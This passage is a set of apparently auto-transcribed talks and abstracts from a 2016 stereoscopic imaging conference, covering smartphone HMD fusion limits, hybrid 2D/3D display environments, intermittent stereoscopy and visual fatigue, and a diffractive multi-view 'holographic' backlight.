direction and also positive value means the flux of far direction. The blue line indicates the far fusion limit and the red line also indicates the near one. As the HMD condition, the fusion limits generally tended to cross direction. Furthermore, the tendency was stronger at near fusion limits than far. Two examines are interaction between the view was IPD and internet distance. We examined the results that focused on the difference between the IPD and the internet distance. Participants were divided into two groups. Participants whose difference was plus minus 2.0 meter or less were categorized into the small differential group under 60.0 and 62.5 millimeter conditions. The remaining participants were categorized into the large differential group. Under the 57.5 millimeter conditions, this difference's value was set 5.0 meter in order to make equal the sample size with other conditions. In these figures, the vertical axis indicates the difference of fusion limit of control condition as a disparity angle. The small differential group shows the smaller difference of the fusion limits than the larger differential group. However, the tendency was reversed under the 62.5 millimeter condition, whereas changing the small differential group was larger. Now I summarize the results and give a consideration. The results of the experiment shows that the far and near fusion limit tended to be close in HMD condition. This results suggested that the simple HMD make easier to view the near parallax image. However, the meaning that make easier to view the near parallax is to say in other words, make harder to view the far parallax. These results are not always positive from the perspective of image safety. Moreover, we consider that why the fusion limits were changed to near. One possibility is that there might be a psychological effect of viewer trying to see an image that is close to the viewer because both the lens and the housing itself are close to the eye. As a result, the changes in fusion limit from that of control conditions was smaller in the small different of IPD and internal distance. This results suggested that the small difference between IPD and internal distance might provide a viewing environment that is similar to the normal 3D display. At the last, I will summarize the knowledge from this study of image safety. A simple HMD make easy to see near parallax. For example, fatigue might be caused by viewing the image that contains extremely negative parallax. Moreover, the internal distance is difficult to adjust because many products fix these lenses, thus it is important to support the various IPD when designing these simple HMD. I'd like to make a conclusion. In this study, we examined the effect of the internal distance when viewing the image through a simple HMD. As a result, from the experiment, we could obtain the knowledge as follows. When viewing the image using simple HMD, the far and near fusion limits tended to be close. Furthermore, the effect was smaller when the difference between IPD and internal distance was small. As the future tasks will continue to investigate the effect by other factors of design. Thank you for your kind attention. Thank you.
|
In this study investigated the effect of the frame design of a simple smartphone HMD on the stereoscopic vision and considered the design requirements for comfortable viewing environment. We mainly focused on the lens spacing used in screen enlargement and extension of the focal length. To investigate the differences in the fusional limit attributable to lens spacing, three HMDs with left/right eye-lens spacing of 57.5, 60, and 62.5 mm were utilized. When the three types of HMD and display were compared, the positive and negative direction fusional limits were closer than the display for all HMDs. In particular, that of 62.5 mm condition was shifted to significantly proximal in comparison with the control condition. The results showed a trend that the fusional range becomes nearer in a simple HMD. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32244 (DOI)
|
Our next paper is titled Hybrid Reality using 2D and 3D together in a mixed mode display. Our speaker is Kurt Hofmeister of Mekdine Corporation where he is Vice President of Technology and Innovation and he's also a co-founder. Good morning. This morning I want to talk about hybrid reality environments but first I'll give you just a quick slide background on Mekdine. Those of you not familiar with Mekdine were a turnkey solution provider for display systems, visualization software and professional services around that. Our experience goes back to 1988. We've seen the rise and fall in variations of 3D and industry and with installations around the world we've certainly seen a wide variety of applications. Just to start off here, Hybrid Reality Environment has several common features. Basically it combines 2D and 3D content and applications, supports immersive interactive visualization but also includes some of the familiar desktop applications and interaction paradigms there. Also it supports a wide variety of media and more importantly multiple participants in a collaborative type work environment. So for an agenda besides a quick introduction here I'm going to take a quick look at history, some of the triggers in the market that have moved these hybrid reality systems to the forefront where we are today with a couple examples and challenges for tomorrow. So let's start clear back in 1992 with the cave coming out of Electronic Visualization Lab University of Illinois. We're lucky to have a few people, Dan Sandin and maybe Carolina Cruz with us this morning who are instrumental along with others in starting up that system. Couple things that jump out to me about the cave too is it quickly became a gold standard for virtual reality, virtual environment type applications and it's still popular today, 20 or more like 25 years after the first system. But it was still a purpose built device monthly for stereoscopic visualization virtuality. It was typically connected to a very expensive supercomputer for graphics. The SGI typically was a major part of any investment and yet the resolution was relatively low at the time, 10 pixels per inch type resolution no more than a megapixel per wall initially. And this was a real challenge for showing text, icons, menus, the data behind the visualization sometimes was difficult to betray or work with. Even so over the years there was a steady increase in resolution from that one megapixel up to 16 megapixels per wall and beyond that's kind of constantly evolved. Around the late 1990s we started building system called a flexible cave. The intent was that you could have a fully immersive and closing cave where you were inside the data or you could open up the sidewalls and had one triple wide display where you might do 3D visualization but less immersive more for presenting to a group. What we quickly found was customers using this type system oftentimes only opened one wall. They kept a corner cave for immersive application and would use a secondary computer for this sidewall usually showing nothing more than 2D applications, PowerPoint presentations, spreadsheets, graphs, things that complemented what was being shown in the immersive simulation. So some of the triggers that became pretty apparent in the early 2000s were of course the increasing resolution and brightness. We also saw the rise of powerful graphics computers and the kind of fading out of SGI and sun super graphics computers. At the same time there was this move from cave type systems being a research device to becoming part of the daily workflow in many of the companies we worked with. So being part of that daily workflow there was a pretty high expectation to support desktop applications, different types of collaboration and your typical office uses. One thing interesting to note in 2003, many universities, Mekdine and other companies began to experiment with OpenGL Interception. I don't want to get too far off in the weeds here but the beauty of OpenGL Interception was you could run a desktop application like a CAD application that used OpenGL graphics and whether the application was aware or not you could intercept calls to the graphics library, send those to a visualization cluster and re-render it for a cave. We could take an application at that time that was not intended for stereoscopic use, make it stereoscopic, immersive, interaction, head tracking, all those things could be then added to the application. Quickly expanded the way a cave or a hybrid reality type system would then be used. So we quickly jumped to several caves now around the world that have 4K resolution, 4K by 4K on each wall. If we kind of contrast that quickly, it's a 16-fold resolution increase per surface. We went from a fairly coarse data representation where text and 2D data was difficult to combine to the extreme case where without some degree of filtering and grouping of data you could display now clouds of data so dense it became difficult to work with. And so oftentimes there'd be a 2D component of these applications even though they were immersive once you started filtering you would see 2D representation of some data subset as part of the actual environment. At the same time an early adopter of 3D visualization was the oil and gas industry and instead of partitioning their display, this is like a large three channel curve screen, they really drove forward a windowing type approach. So the curve screen was treated as one big desktop and everything on it was actually a window. It could be size and position wherever you wanted. So although there might be a stereoscopic application or even something more fully immersive, it was oftentimes intermixed with video and models and other 2D data sources. So this became a true model of a hybrid environment but typically all these windows would be related to whatever the topic at hand was but they didn't necessarily interact with each other. So the simulation would be separate from a model of the rig or some of the data being shown at the same time. We also saw a few changes in the driving mechanism behind these displays, moving from projectors which we had from the very beginning to projection cubes and today a fair amount of use after the implementation of 3D TVs, the LCD flat panels going forward OLED flat panels still with some bezel. And I really predict by the end of this year, early next year, we're going to start to see displays built from DirectView LED 3D capable used for these same hybrid environments and I'd love to talk to any of you about that more after the talk this morning. So jump forward, here's an example of a University of Arkansas research lab flexible cave even though this cave uses an array of eight projection cubes per wall, it's still often used where there's an immersive application running on part of the cave and 2D presentation segmented off to one side. It really wasn't until 2012 when University of Illinois Electronic Visualization Lab began developing cave 2 that we saw a lot of these things for hybrid use really, really come together. The cave 2 if you haven't experienced one, you're certainly welcome to visit Mekdyne or I can't speak for Electronic Visualization Lab but it's quite a system to see it's 25 foot diameter, multiple columns of flat panel arrays and some important things here is it still supports 3D immersive applications and typically it supports some type of multimedia windowing at the same time. There's maybe six of these in the world now and smaller subsets that might be a half or a quarter of the full cave 2. Interesting note cave 2 is a trademark registered to the University of Illinois just like the name cave, I hope cave 2 becomes as generic and wide used as cave has become. So to follow on from that previous example, this is a working session where they're exploring a simulation I think it's crack propagation in a glass crystal and structure. You can imagine quite a few different scenarios around this but you have one or more stereoscopic visualizations going on. You have representations of the data through different modeling, of course they brought in a paper whether they're reviewing that for reference or maybe they're actually working on the content that goes into that paper. You can really see a wide variety of media and how people are engaged here. Because it's a windowing type system, each of these participants may actually be doing some portion of the interaction through their own laptop on a portion of the screen. So it's truly a hybrid approach depending on what resources are brought into the system. A good example, I'm far from an expert on this so I can give a few high points. The NASA endurance project lowered an autonomous vehicle into Botany Lake in the Antarctica and began doing a sonar scans mapping and water data sampling. Early on they knew ahead of time but they quickly realized that the salinity of the water was a challenge for the sonar data. In near real time with feedback, they were visualizing the data as they got it while processing it, visualizing it and making decisions about changing parameters on how the sonar was collected to improve the integrity of the data. At the same time they had this visualization running with the white markers you see that were known depth markers so they could also kind of validate accuracy of the data as it was coming in. Later on this system went to kind of a post-processing phase. That's another great example of the hybrid use of the system. You can see the gentleman with dark hair in the center is running an immersive application looking at point clouded data. At the same time a lot of the other participants are looking off to the left at more 2D representations of the data and what they're doing is they're identifying potentially bad data points, trying to make a decision about how well that fits with the surrounding data and whether or not to exclude it from the data set. So this is a very interactive cleanup phase making full use of the system. To go back to one of the flexible cave systems, this is a nice example from Hemholtz Center for Environmental Research. This is a newer oil and gas application where you have seismic representation and then an oil field with a bunch of wells. What's really nice about this application is it combines the 3D immersive part that what you, where you position yourself and what you select in the virtual environment, determines what's shown on the two side screens in terms of a map and data representation. So all your 2D data in this case isn't just pulled up separate, it's keyed into the application. This application does a great job of combining the two very effectively. Some of the cave two systems that I'm aware of, Mekdine provided at least three of them, are used primarily for education and research environments. So the picture to the left there is University of Illinois Electronic Visualization Lab lecture taking place in the cave two. Again this is multimedia content, some of the things on the screen are actually being brought up by students from their own laptop, some of it's being served from the system that drives the display. So a real good mix going on there. The image to the upper right is Sunshine Coast University in Eastern Australia. This is a flipped classroom model where there's work tables scattered throughout the room, but they all tie back to one large immersive display that's 3D touch, cannot often be used for lecture sharing content from one or more of the student work tables out in the room. The bottom right picture would be typical PowerPoint presentation like we use today, but there's other tools out there Prezi is one no one has used at this conference that I was aware of yet, that is more of a web based PowerPoint that could really effectively take use of this pixel real estate on a large display. And I'd certainly challenge folks that tools like that that do your presentation on a large pixel space are somewhat lacking or custom developed. Even if we had more of those tools the interaction is still a challenge, often times the interaction paradigm comes down to the specific application. Yet the number of things we have in terms of interactive wands, touch, gesture, we all carry smartphones our own personal interaction device and of course voice. Those things are not necessarily intuitive to use in the systems that make use of them have a challenge for help and guidance and using those things. Of course my pitch I think it's important to use technology integrator who's familiar with a wide range of technologies to effectively apply some of these things as well. So main challenges going forward would be there certainly is no universal control or interaction paradigm. There's a rich area of work to go on there. Multi-participant interaction, most of the applications I've worked with really are centered around a single point of interaction. At least with a windowing control, a windowing system overlaid on it, you can have multiple content and multiple participants interacting with their own content but that's kind of the extent of it. So there's definitely continued challenges around integrating 2D and 3D applications. Final thing, the broader reality most of us collaborate with remotely scattered groups. These systems definitely need more work for supporting remote participants. Thank you. I hope I have a moment for any questions.
|
Critical collaborative work session rely on sharing 2D and 3D information. Limitations in display options make it difficult to share and interact with multiple content types content simultaneously. As a result, displays capable of showing stereoscopic content are predominately used for 2D applications. This presentation will illustrate Hybrid Reality—a strategy for showing and interacting with 2D and 3D content simultaneously on the same display. Example displays, use cases, and case studies will be discussed. By using the Hybrid Reality environment, manufacturing organizations have achieved ROI with time and cost savings as well as improved collaboration for complex design problems. In higher education, Hybrid Reality displays support instruction and curriculum design by providing a process to share a wide spectrum of 2D and 3D media and applications into classroom setting. This presentation will share detailed case studies of both applications. This presentation will demonstrate how a Hybrid Reality display system can be used to effectively combine 2D and 3D content and applications for improved understanding, insight, decision making, and collaboration. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32245 (DOI)
|
Investigating intermintent stereoscopy, its effects on perception and visual fatigue. Our speaker is Ari Boanich. Ari has just graduated as a valedictorian from a Master of Science in Digital Creation and Publishing with a focus on virtual and augmented reality at the University of Paris 8. Thank you Mr. Chairman for this introduction. So I'm going to talk to you about intermintent stereoscopy and its effect on perception and visual fatigue. And I'd like to start with a couple of facts actually. Is this working? Yes it is. Alright so virtual reality which involves S3D content is used in a growing number of industries for prototyping for example. And it is well known that S3D aids perception of distances and curvature on the Z or the depth axis while it is very tiring to the visual system. Alright, oops, little problem with the PowerPoint. So it felt paramount to us to safeguard the visual system of people working with such tools. The second fact was something that we actually discovered in the course of a previous experiment. We were displaying to observers S3D content and we gradually decreased disparity so that we ended up with a monoscopic image. And this actually triggered no reaction whatsoever in observers which might suggest that stereopsis is a rather weak cue. So we actually ended up thinking well could intermintent stereoscopy and by this we understand displaying mono and then stereo stimuli or vice versa. Could this be actually the best of both worlds? Aiding depth perception while being less tiring to the visual system. So this gave way to a number of research hypotheses. Could intermintent stereoscopy lead to a more accurate perception than mono or at least a perception as accurate as stereos? And by accurate we mean a perception evaluated against an ideal of correctness. Could it lead to a more precise perception than mono? And by precise we mean that results would be more consistent and less scattered than monos? And could it lead to less fatigue and discomfort than full on stereo? So from this we extracted our four experimental conditions, two intermintent stereo conditions, stereo at beginning in which we displayed an S3D stimulus, immediately transitioning linearly for three seconds towards a mono stimulus and stereo at end, a mono stimulus lasting for four seconds, transitioning linearly to a stereo stimulus and of course our two control conditions, full mono and full stereo. So let's now talk about our experiment proper. First of all the experiment was preceded and followed by measurements. Some measurements we took pre-experiment and post-experiment. Stereoacuity was measured using TITMAS test circles. Fusional reserves while converging were also assessed as well as accommodative response with a Donder's push-up test as well as Dunders push-up test and a Flipper lens test plus or minus two diopters. In pre-only we were assessing binocular status as was suggested in one of Lamboy's paper by submitting subjects to the Wilkins Rate of Reading test and computing the ratio of words read correctly in 2D over 3D. They said that it was a good predictor of binocular status and therefore visual fatigue. And in post-only we were actually administering a questionnaire of ten questions modeled after Zerry and Levy's source factors for visual astanopia while watching S3D content and subjects had to rate their answers on a continuous rating scale going from not at all to absolutely. So talking about subjects we had a simple group of 60 individuals aged 15 to 38. We excluded stereobline subjects with a simple stereofly test and we also excluded people over 40 so that accommodative response was not influenced by any presbyopia. A quick word about our experimental tasks. So the experiment consisted of four tasks which were repeated 45 times each for a total experimental time of 45 minutes including pre and post measurements. Those tasks were designed to well constrain subjects to taking depth decisions. The first task was we called a positioning task. So a ball was traveling on the Z axis and passing under an arch and subjects had to press a button when the ball was right under the arch. The second task we called the depth perception task. There were five spheres and six cubes which acted as distractors facing the camera. The cubes were interspersed with the spheres. They all had a random depth which was capped from minus one to plus one meter and the subjects had to point to and select the sphere closest to them. The third task we deemed the curvature perception task. We displayed a cylinder and subjects had to decide whether it was curvier or flatter than usual. This put them in a force choice paradigm and I'll say a few words about this in a minute. The fourth task was called the collision detection task. There were two cubes facing each other and moving in opposite directions. They disappeared from the screen right before they overlapped and subjects had to decide if the cubes hadn't disappeared whether they would have collided or not. Very briefly our apparatus for our stereoscopy hardware we had a vertical four by three meter screen, a retro projected passive stereoscopy set up with infotect goggles and DSPs. Our tracking was done by two ART infrared cameras and constellations of passive markers were affixed onto the goggles and the flight stick enabling us to track the head and one hand of the subjects and the interaction went through the flight stick button. On the software side this was coded in C-sharp inside of Unity 3D and this was interfaced with our immersive setup through middle VR. We're now going to talk about the results for perception. We processed our results through a one way ANOVA followed by Tuki's honest significant different post hoc test. As for precision we analyzed the similarity of variances with brown foresight or Bartlett tests. These are the results for task one and you can see as for accuracy then stereo and stereo at beginning are more accurate. As for precision any condition involving S3D is more precise than mono which has the largest scattering. For task two again stereo and stereo at beginning were more accurate and again any condition involving S3D was more precise than mono. For task three this is when we come back to our force choice paradigm we actually fitted a cumulative normal distribution curve to our data which allowed us to compute the point of subjective equality as well as the just noticeable difference which you see here plotted as the standard deviation of said point of subjective equality. In that task mono and stereo at beginning were more accurate however stereo and stereo at end to a lesser extent were more precise. For task four deciding whether the cubes had collided or not stereo and stereo at end were more accurate while no particular condition was more precise. We also had a look at response times and what we did was we plotted the proportion of response times per half second interval and then process the means of those response time through a one way ANOVA followed by two keys HSD post hoc test as well. So this is for task two and you can clearly see that there is a similarity in the graphs between mono and stereo at end and stereo and stereo at beginning. And if we have a look at the means well there were definitely faster responses in stereo and stereo at beginning. For task three again the similarity is clear between mono and stereo at end and stereo and stereo at beginning. And if we have a look at the means there were faster responses in stereo and to a lesser extent in any of the intermittent stereo conditions. Now for task four the graphs are a little different they're all very similar but we thought that was because time was more constrained quote unquote and that task as subjects felt compelled to actually respond right after the cubes had disappeared from screen. However it's still interesting to look at the means of the response times and again faster responses in stereo and stereo at beginning. Right if we now talk about results for fatigue and discomfort we process the measurements for each optometric variables that we measured through single tail pair T tests as well as a one way ANOVA analyzing the difference between post and pre measurements. We had very few significant results I'm afraid there was better stereo acuity after subjects had been submitted to the stereo condition and we wondered whether this was a sign of adaptation or a false positive. And fusion breakpoint seemed to be affected by stereo and marginally by stereo at beginning and if we had a look at the graph for that fusion breakpoint even if the ANOVA was not significant it seems that. Fusion stereo at end sorry seems to affect it the least now visual discomfort measurements were processed through a one way ANOVA for each question and a one way ANOVA that was global taking into account the sum of all scores for each question. And we also performed a linear correlation tests between the ratio for the Wilkins rate of reading test and the discomfort declared by subjects. And there was no significant difference in subjective answers between conditions and the coefficient the correlation coefficient between the rate of reading test ratio and the discomfort declared by subject was very little about point 25. So if we now try to analyze these results it seemed to us that there was a difference between simple environment and mental operations and more complex environment and mental operations by simple environments we mean environments that have only static objects or objects moving but movement is sparse happening only on one subject. And that object is traveling on one axis only more complex environments included more objects moving on several axes or more complex mental operations like evaluating a curvature and not only a distance. So in the case of simple environments it seems that disparity at task onset leads to better depth decisions which are comparable to stereo and that was the case for tasks one and two. For more complex environments or mental operations disparity when making the depth decision leads to generally more accurate decisions or decisions that are at least comparable to those of stereo and that was the case for test three and four. If we now have a look at precision again the same dichotomy goes on with for simple environments and mental operation S3D at task onset leads to better precision whereas for more complex environments or mental operations further experiments would be necessary to determine whether S3D stimuli when decision making increased precision. It seems that they do for task three but not for task four. So we posited that for a simple environment it seems that the brain actually constructs a depth map of the environment which it can keep using even after disparity cues have been removed. Now if we have a look at response times initial S3D stimuli accelerate response and so we posited that if there was disparity at task onset then the brain would trust its initial judgment which would speed up response. If we now analyze fatigue and discomfort or at least the few significant results that we got we well first of all it with the results that we had it was impossible for us to claim that intermittent S3D cause less fatigue than constant S3D. However stereo at end we saw seems to affect subjects visual systems less this could possibly be explained by the time of exposure to S3D. So here are the proportions of responses per half second time intervals for tasks two and three and we actually overlaid on top of this graph the percent of disparity and it seems that for stereo at beginning 63% of responses were given while viewing S3D stimuli. Whereas for stereo at end only 49.5% of responses were given viewing S3D so it would seem that fatigue and S3D is proportional to exposure to S3D stimuli. Alright so let's now talk about future work a lot remains to be done first of all it would be extremely interesting to assess visual fatigue more accurately with more reliable tests and measurements. So replacing the TITMAS test which is known to be easily cheated because of the presence of monocular cues by a random dot stereogram test and replacing the subject dependent measurements of accommodated response by measurements made with an atoll refrectometer would be a good idea. It would also be extremely profitable to assess subjective visual discomfort in a better way than what we did here. Indeed our study for practical reasons followed a between subjects design because it was deemed very impractical to ask people to come back to the lab four times in sessions based more than 24 hours apart to ensure full visual system recovery. But next time it would be advisable to follow a within subject design even if it results in more constraints for us and for the subjects. It would also be interesting to isolate stereopsis our results were sometimes pretty pulled together probably because other depth cues ended up compensating for the absence of stereopsis. So suppressing those other cues as much as possible and especially motion parallax which was a very powerful cue would help to isolate and study how stereopsis works. Last but not least it would be extremely interesting to assess this depth map lifetime if the brain indeed creates an initial depth map of its environment then it would be extremely interesting to isolate which factors make this map obsolete and trigger its reevaluation. All right thank you very much for your attention this is also a very good time for me to thank IDFICREATIC which is a trans university innovative program sponsoring innovative teaching and research projects in which funded my coming to this conference. Thank you.
|
In a context of virtual reality being ubiquitous in certain industries, as well as the substantial amount of literature about the visual fatigue it causes, we wondered whether the presentation of intermittent S3D stimuli would lead to improved depth perception (over monoscopic) while reducing subjects’ visual asthenopia. In a between-subjects design, 60 individuals under 40 years old were tested in four different conditions, with head-tracking enabled: two intermittent S3D conditions (Stereo @ beginning: S3D at task onset linearly transitioning to mono in 3 seconds; Stereo @ end: monoscopic at task onset for 4 seconds, linearly transitioning to S3D in 3 seconds) and two control conditions (Mono: monoscopic images only; Stereo: constant S3D). Several optometric variables were measured pre- and post-experiment, and a subjective questionnaire assessing discomfort was administered. Our results suggest a difference between simple scenes (containing few static objects, or slow, linear movement along one axis only), and more complex environments with more diverse movement. In the former case, Stereo @ beginning leads to depth perception which is as accurate as Stereo, and any condition involving S3D leads to more precision than Mono. We posit that the brain might build an initial depth map of the environment, which it keeps using after the suppression of disparity cues. In the case of more complex scenes, Stereo @ end leads to more accurate decisions: the brain might possibly need additional depth cues to reach an accurate decision. Stereo and Stereo @ beginning also significantly decrease response times, suggesting that the presence of disparity cues at task onset boosts the brain’s confidence in its initial evaluation of the environment’s depth map. Our results concerning fatigue, while not definitive, hint at it being proportional to the amount of exposure to S3D stimuli. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32246 (DOI)
|
David Fatahou, and he's from Leia3D, and his speech will be on holographic reality. We're talking a lot about virtual reality, augmented reality these days, and what I want to present to you is a concept that we call holographic reality, which is really, we want a strong belief that virtual world is good on headset, it's very immersive, but there's a lot of application, actually a lot more that could be on headset, that could be on regular screen with the usual way that you actually interact with the digital world, which is when you want it, you turn it on, you interact with it, and then when you're done you just look away and then you're kind of back to your regular life, and that you can do with a headset. So what I want to talk about, so I'm David Fatahou, I'm the founder and CEO of a startup from Menlobark called Leia Inc., we're a spinoff from HP, and I'm going to be describing a little bit of our vision, our technology, and some of the applications, everything in less than 20 minutes, okay? So the vision of the company is this, right? I think today all of our information is obviously transitioning from the physical world to the digital world, our communication, our knowledge, the way we entertain, the way we work everything is now on servers in the cloud, yet, you know, we're still made of flesh and bones, and you know, we still essentially need to experience all that information in a physical form, which means we need to find ways, intuitive ways to bring back the digital world into our own, okay? This is fundamentally what you do with a 2D display, right? I'm trying to talk at a very abstract level here. A 2D display takes bits and bytes and essentially materializes it into a 2D image on the screen, possibly with a touch screen, you can interact with it, and you're getting essentially to interact with the digital world. And that's the way that we've been interacting with technology, it's been about 10 years now on your iPhone and so on. Obviously, you know, the same way that we transition from black and white TV to color TV, it's been a while it's been predicted we will transition from, you know, flat screens to 3D screens, okay? The world is not flat, so if you want to get a more intuitive interaction with the digital world, you should somehow be able to render the digital world in the third dimension. So recently, right, there's been a lot of craze about VR AR, and they do provide that immersion. It's actually very easy to do 3D. It's quite easy to do 3D with a VR AR headset because you just have two different displays that are following your eyes at all time. And as I said in my mini introduction earlier, right, they come at the expense of having to wear bulky eyewear, which impairs mobility, social interactions. It's quite funny actually, VR AR what happened is that you get to collaborate and to interact with people on other continents, but you're actually isolated from the person next to you, right? So if you want to maybe enjoy, you know, a football game in a bar, usually you want to be close to the people around you, you're not going to isolate yourself with the headset. And you walk in the street and you want to place a quick phone call. You don't want to, I want to have to wear a headset with a mini computer attached to your belt, you know, at all times. Emerging solution, right, is the topic I think of this conference is, you know, stereoscopic 3D displays, in particular naked eye 3D displays that are able to render the digital world in 3D in a completely unobstructive way, just from the screen. However, due to restriction in field of view or in the eye tracking case, there's a little bit of lag and so on and so forth, this still do not offer the total freedom of movement that you would expect from interacting with technology, right? So there's actually no good solution today and what I'm trying to present here, what we're developing at Leia is this quote-unquote holographic platform that is interactive, mobile, intuitive and that essentially lets you interact with holographic quote-unquote objects from any position in an unrestrictive way. And so this is that platform that we call holographic reality, okay? So when I say holograms, I don't want to get into the old debate about what's a hologram, you know, hologram in the broad sense that it's an object that looks and feel like a hologram which means it pops out of the screen and when you move around it, it has very smooth parallax transition and you get to see all kind of perspective around it without jumps and anything like that. So think of it as a very good, a very good multi-view 3D display, for example. And what we're building at Leia is not only we have that capability to render 3D images very, very nicely with very smooth sense of parallax but we augment it with so-called hover touch technology that lets essentially senses your finger above the screen without having to touch the screen. So we can interact with the holograms essentially without touching the screen. Some of you might have gotten a demo yesterday. I think we were there at the demo session. I think you could manipulate the skeleton by just, you know, moving your finger around the screen. It's also in our ambition to integrate so-called haptics and this is essentially ultrasonic technology. You emit ultrasound from the side of the display. If you know where your finger is located, you can actually make the ultrasound interfere in phase under your finger and you'll feel a physical sense of touch. So at that point, you'll be able not only to visualize holographic content and interact with it but you'll be able to actually feel it. So this is the digital world that is literally materialized into the real world and that's basically what we believe is going to be the user interface of the future. Might it be on your mobile phone, might be in the car, in your home, at the office and the vision for, you know, from five to ten years is our world is going to be filled with displays, every single door, every single table, every single, you know, place in your car, in your home, at the office, in public places, is going to be filled with displays, an interactive displays where you can summon the digital world, do some kind of operation and then get on with your life. All right, so that's what we're trying to build. So a little bit about the product today, what it is exactly. We managed to do that with a regular LCD technology. We're 100% compatible with the current LCD supply chain in Asia. And so what we have is we take an LCD display, we actually keep the standard LCD panel on top, you know, commodity technology, low margin and so on and so forth. There's a bunch of vendors in Asia that you can work with. And essentially what we do is we replace the backlight and we replace it with our own backlight that we call a multi-view backlight that has essentially some diffractive pattern on it. So it's a proprietary diffractive pattern that is able to take side illumination light and create what has become to be known as a light field. So we create a light field, a static light field underneath the LCD display. So we create a bunch of colored light rays. We know where these light rays come from. They come from different locations. They propagate in different directions. And they actually have a very controlled, and I'll come back to that, they have a very controlled angular spread. So when these light rays come through the LCD, we can modulate their intensity and what you get is a multi-view 3D image. That is not only full parallax in a wide angle, but it's actually very, has very smooth view transitions. So you don't get the usual jumps that you can see with maybe lenticular or other type of displays. It's actually very, very smooth. And because it's wide angle and because it's very smooth, it lets you essentially interact. It lets you move around the display very comfortably and it lets you interact with it. So that's the difference between having a narrow field of view and having a big field of view is when you have a big field of view, you forget about the technology and you just go on and go on with your life and essentially interact with the device. Not having to worry, am I going to lose the image or not? And the last layer that faces the user is essentially the LCD display itself, right? So unlike an anticular technology where you have to add a bunch of lenses on top, you're actually facing the LCD display. So we can use right away touch technologies, hover touch, you know, capacitive touch, and then we'll be compatible with haptics as well, essentially without having to change much of the technology. So that's essentially the product. And now I'm going to be talking a little bit more about the backlight. But first, I'm just going to talk about what kind of data needs to be fed into the display. It is still a light field display. This is still essentially multi-view 3D display. So you don't have to compute diffraction fringes or anything like that. The technology is diffraction based, but the diffraction pattern is fixed. It doesn't have to change. And it turns out all you have to feed the display are the equivalent of a certain number of views that are computed, you know, on a computer or acquired through cameras, for example. So the very noticeable fact is we can, we can, I don't like to call it crosstalk, but the way the transition, the way you transition from one view to the next is a very precise function of the diffraction pattern. And we can tune it to whatever degree we want. So we can completely kill the crosstalk. We can have zero crosstalk. Or we can introduce some crosstalk to smooth out the transition. And this is done in the hardware. So that idea of a multi-view backlight came from actually, in another life I was a researcher at HP Labs. And we actually made the cover of Nature for that in 2013. And you see another aspect that I haven't mentioned is the backlight is completely transparent. So we can create holograms that are coming, you know, that look like they're emerging from a transparent piece of glass. So it's quite magical. So here you have piece of glass, it's illuminated from the side. And it's essentially creating this, by our standard today, this is a horrible image. It's very blurry, everything. But that was, you know, the proof of concept back then. And because it's transparent, what it allows you to do is also, if we were to work with the transparent modulator, we could do a holographic display, 3D display that is, that is see-through transparent, okay? Which of course you can do with a parallax barrier display or a lenticular type display, right? So we can, we're compatible with see-through and 3D at the same time. So the principle is this, right? It's basically, we call it diffraction of guided wave. So if you look a little bit inside the backlight, we have a side illumination. This is, you know, this doesn't have all the full information on purpose, but just to give you a gist of how it works. You couple light from the side as in a normal backlighting system. And you have this diffractive pattern that can essentially control exactly how the light is extracted. So every time the light interacts with the diffractive pattern, a little bit is essentially diffracted there in this mode. And then most of it is just reflected and then reflected and then has the chance to interact again. So it's very efficient. In the end, we can, we managed to use most of the light in the light guide. And as I was saying, we control not only the direction and the location of this light rays, but we control exactly how they, their angular distribution. And that's very important. We can even use the same diffraction pattern to create two light rays with actually arbitrary direction. Sometime we use that to increase the density of pixels and the density of views available and so on and so forth. So it's very versatile. And a great advantage compared to a lenticular display, for example, is that diffraction doesn't care how tight the angle of the ray is going to be. If you want to send a light ray in a very grazing direction, you can. This is the same as sending it up. With a lenticular display, you need to be close to axis. If you deviate too much from the parallax approximation, you're going to get blurry images. But here you don't care. So as I mentioned before, it turns out that this diffractive pattern is going to act, is going to diffract the light that is guided in the light guide. But for light that is coming straight through, it has no diffraction effect whatsoever. So the light can go through completely unaffected. So that has to do with the transverse momentum of light. Light that is in the light guide has a very large transverse momentum, which means that in order to diffract it, you need a feature size that is pretty small. And when the light comes with near normal incidence with almost zero degree angle, it has a very small amount of momentum there. And this essentially, this grading gives too much of a momentum kick in either direction, and then there's no propagating order that corresponds to it. So again, it's completely transparent. We can give again, we have full freedom. So even if you work with the square array of LCD pixel, you can still define. You have the freedom to define an arbitrary set of views. So for example, here was an example, an early example where we build a hexagonal set of views through a square LCD panel, if you wanted to, just to show you the freedom. And again, what I alluded to that's very important to understand is that each view, we can control all aspects of the radiation pattern. So this one, we wanted to have a flat top, and then we wanted to control a certain, essentially a amount of overlap between the views to create a certain smoothness effect. And then we also wanted the image to kind of die down. So this had eight views, horizontal view one through eight. We wanted view one and view eight to kind of die down so that there was, you know, this is the next, this is essentially, this is the next view here that would be view number nine and it's completely suppressed. So when you look at the display and you move from the left to the right, you see a large amount of parallax, 60 degree field of view. And then if you move too far, instead of seeing a jump back to view one, you know, just the, essentially the brightness decreases and you fade away just very gracefully, right? So it doesn't jump. And at no point you have the sensation of having this inverted 3D, you know, sensation where the left eye image goes to the right eye and vice versa. So it's actually, it is very pleasant. So there's one, there's one usually pain with diffraction is how they do deal with color. So everything I've described so far works well with one color. But now if you take the usual diffraction or holographic kind of configuration, if you send white light on a diffraction pattern, most of you know that what you will get is for first of all, most of the light will go through an undefracted. So we solve that by illuminating with guided light. There is just, there is no zero order propagating order. So this never happens for us. But which, which the thing that could be more disastrous is the first diffracted order gives you a lot of, a lot of color dispersion. So essentially, and actually it's drawn wrong here. The red should be here and the blue should be there. But essentially this should completely break down the colors. You should have, you know, a color in a, you know, in one, one certain range of angles and then another color there, another color there. Most of our patents actually have to do with how we deal with that problem. And we have, we illuminated the light guide in a special way with either with white light or different color of light. But we have to be very careful how we illuminated the system and what we get are actually light rays that are possibly coming from different position but, but that are parallel. So they define the same exact set of views. So that when you look at our display, you don't see any color bleeding. If you want to create a white object, it's perfectly white, including at the edges. That's the really hard part about diffraction. So that's where all the, all the work has to, has to go when you look in the detail to have a high quality display. Perfect. So now it's just a little bit of a, not the marketing, but I want to describe. So the company, just, just to tell you what it, what it takes, right? So we found it two years ago. We spun off HP Labs. We're about 25 employees and we have operation in Menlo Park. Palo Alto, believe it or not, we actually, we bought an ASML stepper and that's how we prototype all of our displays. So the stepper is a optical lithography tool that can, we have a, we can go down to 85 nanometer resolution. 